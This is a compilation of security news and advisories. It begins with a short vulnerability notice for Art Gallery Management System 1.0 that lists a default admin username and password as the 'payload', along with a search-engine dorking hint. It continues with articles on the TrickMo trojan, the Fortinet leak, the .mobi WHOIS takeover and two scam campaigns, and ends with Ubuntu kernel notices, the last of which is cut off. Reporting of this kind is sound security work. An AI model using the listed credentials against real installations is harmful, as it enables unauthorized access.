Art Gallery Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Art Gallery Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: john@test.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Art Gallery Management System 1.0 Insecure Settings

Cybersecurity researchers have uncovered a new variant of an Android banking trojan called TrickMo that comes packed with new capabilities to evade analysis and display fake login screens to capture victims' banking credentials.
"The mechanisms include using malformed ZIP files in combination with JSONPacker," Cleafy security researchers Michele Roviello and Alessandro Strino said. "In addition,

Cybersecurity researchers have uncovered a new variant of an Android banking trojan called TrickMo that comes packed with new capabilities to evade analysis and display fake login screens to capture victims' banking credentials.

"The mechanisms include using malformed ZIP files in combination with JSONPacker," Cleafy security researchers Michele Roviello and Alessandro Strino said. "In addition, the application is installed through a dropper app that shares the same anti-analysis mechanisms."

"These features are designed to evade detection and hinder cybersecurity professionals' efforts to analyze and mitigate the malware."

TrickMo, first caught in the wild by CERT-Bund in September 2019, has a history of targeting Android devices, particularly targeting users in Germany to siphon one-time passwords (OTPs) and other two-factor authentication (2FA) codes to facilitate financial fraud.

The mobile-focused malware is assessed to be the work of the now-defunct TrickBot e-crime gang, over time continually improving its obfuscation and anti-analysis features to fly under the radar.

Notable among the features are its ability to record screen activity, log keystrokes, harvest photos and SMS messages, remotely control the infected device to conduct on-device fraud (ODF), and abuse Android's accessibility services API to carry out HTML overlay attacks as well as perform clicks and gestures on the device.

The malicious dropper app discovered by the Italian cybersecurity company masquerades as the Google Chrome web browser that, when launched after installation, urges the victim to update Google Play Services by clicking the Confirm button.

Should the user proceed with the update, an APK file containing the TrickMo payload is downloaded to the device under the guise of "Google Services," following which the user is asked to enable accessibility services for the new app.

"Accessibility services are designed to assist users with disabilities by providing alternative ways to interact with their devices," the researchers said. "However, when exploited by malicious apps like TrickMo, these services can grant extensive control over the device."

"This elevated permission allows TrickMo to perform various malicious actions, such as intercepting SMS messages, handling notifications to intercept or hide authentication codes, and executing HTML overlay attacks to steal user credentials. Additionally, the malware can dismiss keyguards and auto-accept permissions, enabling it to integrate seamlessly into the device's operations."

Furthermore, the abuse of the accessibility services allows the malware to disable crucial security features and system updates, auto-grant permissions at will, and prevent the uninstallation of certain apps.

Cleafy's analysis also uncovered misconfigurations in the command-and-control (C2) server that made it possible to access 12 GB worth of sensitive data exfiltrated from the devices, including credentials and pictures, without requiring any authentication.

The C2 server also hosts the HTML files used in the overlay attacks. These files encompass fake login pages for various services, counting banks such as ATB Mobile and Alpha Bank and cryptocurrency platforms like Binance.

The security lapse not only highlights the operational security (OPSEC) blunder on the part of the threat actors, but also puts the victims' data at risk of exploitation by other threat actors.

The wealth of information exposed from TrickMo's C2 infrastructure could be leveraged to commit identity theft, infiltrate various online accounts, conduct unauthorized fund transfers, and even make fraudulent purchases. Even worse, attackers could hijack the accounts and lock the victims out by resetting their passwords.

"Using personal information and images, the attacker can craft convincing messages that trick victims into divulging even more information or executing malicious actions," the researchers noted.

"Exploiting such comprehensive personal data results in immediate financial and reputational damage and long-term consequences for the victims, making recovery a complex and prolonged process."

The disclosure comes as Google has been plugging the security holes around sideloading to let third-party developers determine if their apps are sideloaded using the Play Integrity API and, if so, require users to download the apps from Google Play in order to continue using them.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

TrickMo Android Trojan Exploits Accessibility Services for On-Device Banking Fraud

A hacker claims to have stolen 440 GB of data from cybersecurity firm Fortinet, exploiting an Azure SharePoint…

A hacker claims to have stolen 440 GB of data from cybersecurity firm Fortinet, exploiting an Azure SharePoint vulnerability. The breach, dubbed “Fortileak,” was revealed on a forum with access credentials shared online.

A hacker using the alias “Fortibitch” has claimed responsibility for leaking 440 GB of data belonging to Fortinet, a prominent cybersecurity firm based in Sunnyvale, California. The hacker stated that the stolen data is now accessible for download via an Amazon S3 bucket, with details of the breach and access credentials shared on the popular underground forum, Breach Forum.

**The Breach: Fortileak**

Dubbed _Fortileak_ by the hacker, the breach allegedly originates from an exposure in Fortinet’s Azure SharePoint instance. In the forum post, the hacker pointed out recent acquisitions by Fortinet, including the Data Loss Prevention (DLP) firm Next DLP and the cloud security company Lacework. They then claimed that Fortinet’s Azure SharePoint had been compromised, allowing for the extraction of the substantial data cache.

The full scope of the compromised data remains unclear, though the hacker emphasized that the breach involves Fortinet’s cloud infrastructure. The hacker provided the following credentials for accessing the alleged stolen data:

Screenshot: Hackread.com

**Ransom Demands and Negotiation Breakdown**

In a further twist, the hacker claimed that Fortinet’s CEO, Ken Xie, walked away from ransom negotiations. In the forum post, the hacker ridiculed Xie, alleging that the CEO refused to engage, stating that he “would rather eat some p\*\*p than pay ransom.” The hacker also questioned why Fortinet had not filed an SEC 8-K form (PDF)—a document required by public companies to disclose major incidents.

The post also contained a mix of taunts and shout-outs to other individuals or groups, which seemed to further underline the hacker’s brash attitude toward the attack and its aftermath.

**Fortinet’s Response**

Hackread.com reached out to Fortinet for an official comment on the breach. A spokesperson for the company confirmed that an unauthorized individual had gained access to a limited number of files stored on a third-party cloud-based shared file drive. These files included data related to a “small” subset of Fortinet customers.

In their statement to Hackread.com, Fortinet reassured stakeholders that there has been no indication of any malicious activity affecting its customers. They emphasized that the company’s operations, products, and services have not been impacted by the breach. Fortinet stated that they have already communicated directly with the affected customers and are continuing to monitor the situation closely.

> _“An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number of Fortinet customers, and we have communicated directly with customers as appropriate. To-date there is no indication that this incident has resulted in malicious activity affecting any customers. Fortinet’s operations, products, and services have not been impacted.”_
> 
> Fortinet Spokesperson

This is not the first time Fortinet has faced a cybersecurity incident. Last year, Chinese hackers were reported to be exploiting a zero-day vulnerability in the company’s products. In another instance, hackers were found exploiting a vulnerability in FortiOS, the operating system for Fortinet’s security appliances, to compromise organizations and customers.

Nevertheless, for now, the full extent of the breach remains under investigation, and it is unclear whether the alleged stolen data will be used maliciously or if the ransom negotiations will have any further developments. As more information emerges, both customers and cybersecurity professionals will be watching closely to assess the impact of this incident.

1.  **World’s Leading Cybersecurity Firm Kaspersky Hacked**
2.  **CISA and Fortinet Warns of New FortiOS Zero-Day Flaws**
3.  **X Account of Google Cybersecurity Firm Mandiant Hacked**
4.  **Cybersecurity Firm Hacks Itself, Finds AWS Credentials Leak**
5.  **Hackers dump plain-text login credentials of Fortinet VPN users**

Fortinet Confirms Limited Data Breach After Hacker Leaks 440 GB of Data

Their findings highlight the frailty of some of the mechanisms for establishing trust on the Internet.

Source: Aree\_S via Shutterstock

Security researchers' ability to gain control of a chunk of the Internet's infrastructure for a mere $20 has focused attention on the fragility of the trust and cybersecurity mechanisms that organizations and users rely on daily.

The troubling event began with researchers at watchTowr on a whim looking for remote code execution vulnerabilities in WHOIS clients while at the recent Black Hat USA conference in Las Vegas. In poking around, the researchers discovered that the WHOIS server for the .mobi top level domain (TLD) — for mobile-optimized sites — had migrated a few years ago from "whois.dotmobiregistry.net" to "whois.nic.mobi". After the change, the registration for the original domain (whois.dotmobiregistry.net) expired last December.

**An Accidental Discovery**

A WHOIS server is like a public phone book for the Internet and contains information on the owners of an IP address or website along with lots of other related information. A WHOIS client is a tool that queries for and retrieves information about a specific domain name or IP address from a WHOIS server.

On a lark, the watchTowr researchers spent $20 to register the expired whois.dotmobiregistry.net in the company's name and stick a WHOIS server behind it to see if any WHOIS clients would query it. Their initial presumption was that few, if any, WHOIS clients would still touch the decommissioned server after the migration to the new .mobi authoritative WHOIS server (whois.nic.mobi) a few years ago.

To their surprise — and consternation — watchTowr researchers found over 76,000 unique IP addresses sending queries to their WHOIS server in just a couple hours. In about two days that number had ballooned to over 2.5 million queries from 135,000 unique systems worldwide.

Contrary to their expectations, among those querying watchTowr's WHOIS server were major domain registrars and websites performing WHOIS functions. Also querying watchTowr's WHOIS domain were mail servers for numerous government organizations in the US, Israel, Pakistan, India, the Philippines, a military entity in Sweden, and countless universities worldwide. Troublingly, even some security-related websites, including VirusTotal, queried watchTowr's WHOIS server as if it were the authoritative server for the .mobi TLD.

Had watchTowr been a bad actor, they could have easily abused their status as the owner of whois.dotmobiregistry.net to deliver malicious payloads to anyone querying the server, or to passively monitor email communications and potentially create other mayhem.

"In the wrong hands, owning the domain could enable attackers to 'respond' to queries and inject malicious payloads to exploit vulnerabilities in WHOIS clients," watchTowr's CEO and founder Benjamin Harris said in a FAQ on his company's discovery. From the standpoint of government mail servers reaching out to watchTowr's WHOIS servers, "traffic analysis can be performed to passively observe and infer email communication," he said.

**A Serious Domain Verification Weakness**

But even more troubling than that was watchTowr’s discovery of multiple Certificate Authorities (CA) — including those issuing TLS/SSL certificates for domains such as ‘microsoft.mobi and ‘google.mobi — using watchTowr’s server for domain verification purposes.

"It turns out that a number of TLS/SSL authorities will verify ownership of a domain by parsing WHOIS data for your domain— say watchTowr.mobi — and pulling out email addresses defined as the 'administrative contact'," watchTowr said. "The process is to then send that email address a verification link. Once clicked, the certificate authority is convinced that you control the domain that you are requesting a TLS/SSL cert for, and they will happily mint you a certificate."

In other words, watchTowr could provide its own email address to certificate authorities (CAs) in response to domain ownership queries and obtain TLS/SSL certificates on behalf of other organizations. Once again, contrary to expectations, watchTowr discovered multiple well known CAs — including Trustico, Comodo, GlobalSign, and Sectigo — using WHOIS data for domain verification.

"For 'microsoft.mobi', watchTowr demonstrated that CA GlobalSign would parse responses provided by its WHOIS server and present '\[email protected\]' as an authoritative email address," the security vendor said. "watchTowr's discovery effectively undermines the certificate authority process for the entire .mobi TLD, a process that has been targeted by nation-states overtly for years." The research highlights the trivial loopholes in the Internet's TLS/SSL vital encryption processes and structures and shows why trust in them is misplaced at this stage, the researchers wrote.

Nick France, CTO at Sectigo, says the issue has to do with CAs being allowed to use administrative emails on public WHOIS records for domain names. "However, the researchers found that the .mobi registry had changed their WHOIS server in the past and the 'old' name was now available as a registerable domain name — which they did," France says.

This is only a problem if a CA uses an outdated list of WHOIS server, he says. In that event, a CA's WHOIS query could get directed to an outdated server and any attacker that owns it could send any output in response, including an email address of their choice. "This leads to a failure of the domain verification process and thus mis-issued certificates."

The issue that watchTowr discovered highlights why CAs must keep their systems updated, especially with respect to critical processes like domain control validation, French says. "WHOIS is an old, insecure system — often neglected by researchers and users alike, leaving it primed for the discovery of flaws like this one," he notes.

While it may impact only smaller TLDs like .mobi, as opposed to .com, .net, and .gov, it still demonstrates a serious vulnerability in the domain verification process, he says.

Tim Callan, Sectigo's Chief Experience Officer, adds how the incident highlights a need to update some of the rules around Domain Control Validation (DCV). "We should expect the Certification Authority Browser Forum to move quickly on these changes in order to plug this particular hole."

In the meantime, the nonprofit Internet monitoring entity ShadowServer has sinkholed the dotmobiregistry.net domain and the whois.dotmobiregisry.net hostname and is redirecting all queries to the server to the legitimate WHOIS responsible for .mobi domains. "If you have code/systems still using the expired http://whois.dotmobiregistry.net to make WHOIS queries for the .mobi TLD, please update immediately to use the correct authoritative WHOIS server http://whois.nic.mobi," said Piotr Kijewski, ShadowServer's CEO in an email.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

For Just $20, Researchers Seize Part of Internet Infrastructure

Beware before calling Apple for assistance as scammers are creating malicious ads and fake pages to lure you in.

We’ve uncovered a malicious campaign going after Mac users looking for support or extended warranty from Apple via the AppleCare+ support plans. The perpetrators are buying Google ads to lure in their victims and redirect them to bogus pages hosted on GitHub, the developer and code repository platform owned by Microsoft.

The goal of this scam is to get unsuspecting people on the phone with someone pretending to be working for Apple. From there, fraudulent call center agents will social engineer their victims in order to extract money from them.

In this blog post, we expose the techniques behind this scam and provide mitigation steps to stay away from them. We’d like to thank GitHub for their quick response in taking down the malicious accounts we reported to them.

**Hey Siri, google “Apple phone support”**

While Apple products are designed with simplicity in mind, we’ve all come across an issue at some point that we need assistance with. Google, who reportedly paid Apple $20 billion to be the default search engine, will display results in Safari, along with ads, hence the lucrative partnership.

Those “Sponsored” results can appear at the top or further down the search results page. In the image seen below, a malicious ad appears at the very top, right before Apple’s official phone number. In other cases we encountered, multiple malicious ads were displayed before any legitimate results.

Clicking on one of those will redirect to a fake AppleCare+ customer service page, inviting users to call a 1-800 phone number supposedly belonging to Apple. In reality, in just 2 simple clicks victims are connected with scammers located in call centers overseas.

The fake Apple customer service pages are hosted on Microsoft’s GitHub source code repository as standalone HTML templates using Apple’s branding. Scammers are creating several accounts on GitHub with one or multiple repositories with the same fraudulent _index.html_ template:

During an active campaign, they can easily swap phone numbers in case one got reported and blocked. In fact, we saw scammers do just that thanks to GitHub’s commit history:

There is also an interesting piece of code within the page (autoDial) that automatically pops up the phone dialog menu. This ensures that victims have one less thing to click on to get connected with a scammer impersonating Apple:

**Risks and mitigations**

This particular scheme is exceptionally easy to fall for due to the combination of malicious Google ads and lookalike pages. Scammers are preying on unsuspecting users to trust that they are real Apple service agents and that it’s okay to give them personal information.

The biggest risk to consumers is being defrauded for hundreds, and often thousands of dollars. Scammers typically instruct victims to withdraw money from their bank account and send it to them, in various ways.

In some cases we investigated this year, fraudsters will ask for the victim’s name, address, social security number and banking details. With that information, they can easily blackmail them directly or share their profile with other scammers who will pretend to help from the original incident.

We advise users to be extremely cautious when looking for phone or online support related to any of the most popular brands. Microsoft is usually highly targeted by scammers due to its dominance in the computer market share. Keep in mind that whenever you click on a sponsored result or ad, you are taking a chance of being redirected to a malicious site.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Scammers advertise fake AppleCare+ service via GitHub repos 

We dug into PartnerLeak, the site behind the "your partner is cheating on you" emails, including how and where the scammers get their information.

Earlier this week, we reported on a new type of scam that tells you your partner is cheating on you. However, we hit a dead end because we were unable to get hold of an original copy of the email.

That was until the scammers were “kind enough” to send one to one of our co-workers.

your partner is cheating on you and we have proof

> “Hi (target’s name\],
> 
> \[Partner’s name\] is cheating on you. Here is proof.
> 
> As a company engaged in cyber security we’ve found information related to \[partner’s name\] that might interest you.
> 
> We made a full backup of \[his/her\] disk. (We have all \[his/her\] address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all \[his/her\] contacts) and are willing to give you a full access to this data. For more details visit our website.”

With this, we were able to investigate the scammers’ intentions.

All three of the links in the email (Here, website, and Check now) point to the same website. Through a landing page located at click\[.\]cardfoolops\[.\]com visitors are redirected to partnerleak\[.\]com.

The partnerleak\[.\]com domain was registered on August 1, 2024, with NameCheap anonymously. Anonymous registration doesn’t automatically mean the person registering is up to no good, but it did block us from researching this avenue any further.

The registration date, however, matches with the first complaints we started seeing about these emails.

Malwarebytes blocks partnerleak\[.\]com

During the redirection process, your email address is passed on, which means when you register at the site your email address is already filled out.

Email address is transmitted and pre-filled

The PartnerLeak site itself says it offers anonymity, as well as “crucial insights” into the behaviour of the one you love.

> “completely anonymous service leverages artificial intelligence and the vulnerabilities of popular smartphones to provide crucial insights into your partner’s behavior.”

> “**Are You Concerned About Your Partner’s Honesty?**
> 
> If you’ve decided to take a leap into a relationship but find yourself questioning your partner’s honesty, or if you’ve been together for a while and something feels off, we have a solution for you.
> 
> **Our Service**
> 
> Our completely anonymous service leverages artificial intelligence and the vulnerabilities of popular smartphones to provide crucial insights into your partner’s behavior. Here’s how it works:
> 
> Data Backup Access: You can download a backup from iCloud or Google, which includes:
> 
> *   Device location tracking
> *   Movement history with timestamps
> *   Correspondence from popular messaging apps like Telegram, WhatsApp, and iMessage
> *   Photo and video materials stored on the smartphone
> 
> Social Media Analysis: Utilizing AI and extensive data, our service can:
> 
> *   Check user registration and analyze behavior on platforms like Facebook and Twitter
> *   Investigate activity on popular dating apps such as Tinder, AdultFriendFinder, Hinge, and OkCupid
> 
> This comprehensive analysis helps you verify the reliability of your potential partner based on criteria that matter most to you.
> 
> **Commitment to Anonymity and Privacy**
> 
> *   Anonymous Transactions: We prioritize your anonymity by processing payments through cryptocurrencies, ensuring that your partner will remain unaware of your inquiries.
> *   Data Privacy: Your privacy is of utmost importance. We offer the option to permanently delete any data related to you from our system.
> 
> Take control of your relationship concerns today with our discreet and effective service!”

Nowhere on the site does it specify how much such an investigation would cost, but after registration you can start a search at which point it will tell you to top up your balance.

You don’t have free search. Please top up balance or try use different email.

To top up your balance there are three payment options:

*   Credit card
*   Bitcoin
*   Ethereum

We checked the balances on the cryptocurrency accounts they provided and we are happy to report that those are both dead in the water. We can only hope that the PartnerLeak revenue from credit cards looks the same, although that is probably wishful thinking on our part.

An empty and inactive Bitcoin wallet

An equally empty Ethereum account

Our investigation into where the scammers were getting the necessary information always pointed in the same direction: The Knot, a wedding services company.

However, we couldn’t find any breaches of its site or any tangible evidence that it was anything more than just a source of information. Like many other similar sites, it is easy to find a partner name on the site if you already have the name and email of the other partner.

But since many victims, including our co-worker, used The Knot’s services, we contacted them and received this statement from a spokesperson:

> “We were notified of user concerns, and after investigation by our cybersecurity team, determined there is no evidence of unauthorized access to our systems.”

Regardless of where the scammers are getting their data, let’s keep their balance at zero and spread the word.

**How to react to your partner “is cheating on you” emails**

First and foremost, never reply to emails of this kind. That tells the sender that someone is reading the emails sent to that address, and will lead to them trying other ways to defraud you.

*   If the email includes a password, make sure you are not using it any more _on any account_. If you are, change it as soon as possible.
*   If you are having trouble remembering all your passwords, have a look at a password manager.
*   Don’t let yourself get rushed into doing something. Scammers rely on time pressure that leads to people making quick decisions.
*   Do not open unsolicited attachments. Especially when the sender address is suspicious, or even appears to be your own.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 PartnerLeak scam site promises victims full access to &#8220;cheating&#8221; partner&#8217;s stolen data 

Ubuntu Security Notice 7003-2 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7003-2September 12, 2024linux-aws-5.4, linux-azure-5.4, linux-gcp-5.4, linux-hwe-5.4,linux-ibm-5.4, linux-oracle-5.4, linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - MIPS architecture;  - PowerPC architecture;  - x86 architecture;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Pin controllers subsystem;  - S/390 drivers;  - SCSI drivers;  - USB subsystem;  - JFFS2 file system;  - JFS file system;  - File systems infrastructure;  - NILFS2 file system;  - IOMMU subsystem;  - Sun RPC protocol;  - Netfilter;  - Memory management;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - NET/ROM layer;  - Network traffic control;  - SoC Audio for Freescale CPUs drivers;(CVE-2024-40941, CVE-2024-42086, CVE-2024-41097, CVE-2024-40958,CVE-2024-41089, CVE-2024-40942, CVE-2024-40968, CVE-2024-40934,CVE-2024-40902, CVE-2024-42124, CVE-2023-52887, CVE-2024-42115,CVE-2024-41041, CVE-2024-39501, CVE-2024-40932, CVE-2024-42102,CVE-2024-40960, CVE-2024-39487, CVE-2024-39503, CVE-2024-40945,CVE-2024-40959, CVE-2024-40987, CVE-2024-40995, CVE-2024-40988,CVE-2024-42084, CVE-2024-40943, CVE-2024-42070, CVE-2024-40904,CVE-2024-41049, CVE-2024-41046, CVE-2024-39502, CVE-2024-42097,CVE-2024-42090, CVE-2024-42236, CVE-2024-42223, CVE-2024-42094,CVE-2024-41007, CVE-2024-42105, CVE-2024-41035, CVE-2024-41087,CVE-2024-42157, CVE-2024-39495, CVE-2024-36894, CVE-2024-40916,CVE-2024-39469, CVE-2024-40974, CVE-2024-42153, CVE-2024-36974,CVE-2024-42096, CVE-2024-42232, CVE-2024-40980, CVE-2024-41034,CVE-2024-42087, CVE-2024-42093, CVE-2024-41095, CVE-2024-42145,CVE-2024-42148, CVE-2023-52803, CVE-2024-39499, CVE-2024-42104,CVE-2024-42224, CVE-2024-37078, CVE-2024-42092, CVE-2024-39505,CVE-2024-38619, CVE-2024-42106, CVE-2024-40978, CVE-2024-41044,CVE-2024-42089, CVE-2024-40981, CVE-2024-42154, CVE-2024-36978,CVE-2024-42076, CVE-2024-40984, CVE-2024-42127, CVE-2024-42119,CVE-2024-40961, CVE-2024-39509, CVE-2024-42101, CVE-2024-40901,CVE-2024-40963, CVE-2024-40905, CVE-2024-39506, CVE-2024-40912,CVE-2024-41006)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  linux-image-5.4.0-1079-ibm      5.4.0-1079.84~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1115-raspi    5.4.0-1115.127~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1131-oracle   5.4.0-1131.140~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1132-aws      5.4.0-1132.142~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1136-gcp      5.4.0-1136.145~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-1137-azure    5.4.0-1137.144~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-195-generic   5.4.0-195.215~18.04.1          Available with Ubuntu Pro  linux-image-5.4.0-195-lowlatency  5.4.0-195.215~18.04.1          Available with Ubuntu Pro  linux-image-aws                 5.4.0.1132.142~18.04.1          Available with Ubuntu Pro  linux-image-azure               5.4.0.1137.144~18.04.1          Available with Ubuntu Pro  linux-image-gcp                 5.4.0.1136.145~18.04.1          Available with Ubuntu Pro  linux-image-generic-hwe-18.04   5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-ibm                 5.4.0.1079.84~18.04.1          Available with Ubuntu Pro  linux-image-lowlatency-hwe-18.04  5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-oem                 5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-oem-osp1            5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-oracle              5.4.0.1131.140~18.04.1          Available with Ubuntu Pro  linux-image-raspi-hwe-18.04     5.4.0.1115.127~18.04.1          Available with Ubuntu Pro  linux-image-snapdragon-hwe-18.04  5.4.0.195.215~18.04.1          Available with Ubuntu Pro  linux-image-virtual-hwe-18.04   5.4.0.195.215~18.04.1          Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7003-2  https://ubuntu.com/security/notices/USN-7003-1  CVE-2023-52803, CVE-2023-52887, CVE-2024-36894, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37078, CVE-2024-38619, CVE-2024-39469,  CVE-2024-39487, CVE-2024-39495, CVE-2024-39499, CVE-2024-39501,  CVE-2024-39502, CVE-2024-39503, CVE-2024-39505, CVE-2024-39506,  CVE-2024-39509, CVE-2024-40901, CVE-2024-40902, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40912, CVE-2024-40916, CVE-2024-40932,  CVE-2024-40934, CVE-2024-40941, CVE-2024-40942, CVE-2024-40943,  CVE-2024-40945, CVE-2024-40958, CVE-2024-40959, CVE-2024-40960,  CVE-2024-40961, CVE-2024-40963, CVE-2024-40968, CVE-2024-40974,  CVE-2024-40978, CVE-2024-40980, CVE-2024-40981, CVE-2024-40984,  CVE-2024-40987, CVE-2024-40988, CVE-2024-40995, CVE-2024-41006,  CVE-2024-41007, CVE-2024-41034, CVE-2024-41035, CVE-2024-41041,  CVE-2024-41044, CVE-2024-41046, CVE-2024-41049, CVE-2024-41087,  CVE-2024-41089, CVE-2024-41095, CVE-2024-41097, CVE-2024-42070,  CVE-2024-42076, CVE-2024-42084, CVE-2024-42086, CVE-2024-42087,  CVE-2024-42089, CVE-2024-42090, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42096, CVE-2024-42097, CVE-2024-42101,  CVE-2024-42102, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42115, CVE-2024-42119, CVE-2024-42124, CVE-2024-42127,  CVE-2024-42145, CVE-2024-42148, CVE-2024-42153, CVE-2024-42154,  CVE-2024-42157, CVE-2024-42223, CVE-2024-42224, CVE-2024-42232,  CVE-2024-42236

Ubuntu Security Notice USN-7003-2

Ubuntu Security Notice 7003-1 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7003-1September 12, 2024linux, linux-aws, linux-azure, linux-bluefield, linux-gcp, linux-gkeop,linux-ibm, linux-kvm, linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systemsDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - MIPS architecture;  - PowerPC architecture;  - x86 architecture;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Pin controllers subsystem;  - S/390 drivers;  - SCSI drivers;  - USB subsystem;  - JFFS2 file system;  - JFS file system;  - File systems infrastructure;  - NILFS2 file system;  - IOMMU subsystem;  - Sun RPC protocol;  - Netfilter;  - Memory management;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - NET/ROM layer;  - Network traffic control;  - SoC Audio for Freescale CPUs drivers;(CVE-2024-40905, CVE-2024-41095, CVE-2024-41035, CVE-2024-36974,CVE-2024-40959, CVE-2024-40978, CVE-2024-42236, CVE-2024-40963,CVE-2024-40916, CVE-2024-41006, CVE-2024-39495, CVE-2023-52803,CVE-2024-42070, CVE-2024-41041, CVE-2024-42157, CVE-2024-36894,CVE-2024-42153, CVE-2024-42127, CVE-2024-42224, CVE-2024-40932,CVE-2024-42105, CVE-2024-40968, CVE-2024-41044, CVE-2024-41046,CVE-2023-52887, CVE-2024-42094, CVE-2024-40960, CVE-2024-41007,CVE-2024-40961, CVE-2024-39487, CVE-2024-39502, CVE-2024-42086,CVE-2024-36978, CVE-2024-39503, CVE-2024-41049, CVE-2024-42090,CVE-2024-42232, CVE-2024-39499, CVE-2024-40902, CVE-2024-37078,CVE-2024-39501, CVE-2024-42119, CVE-2024-40901, 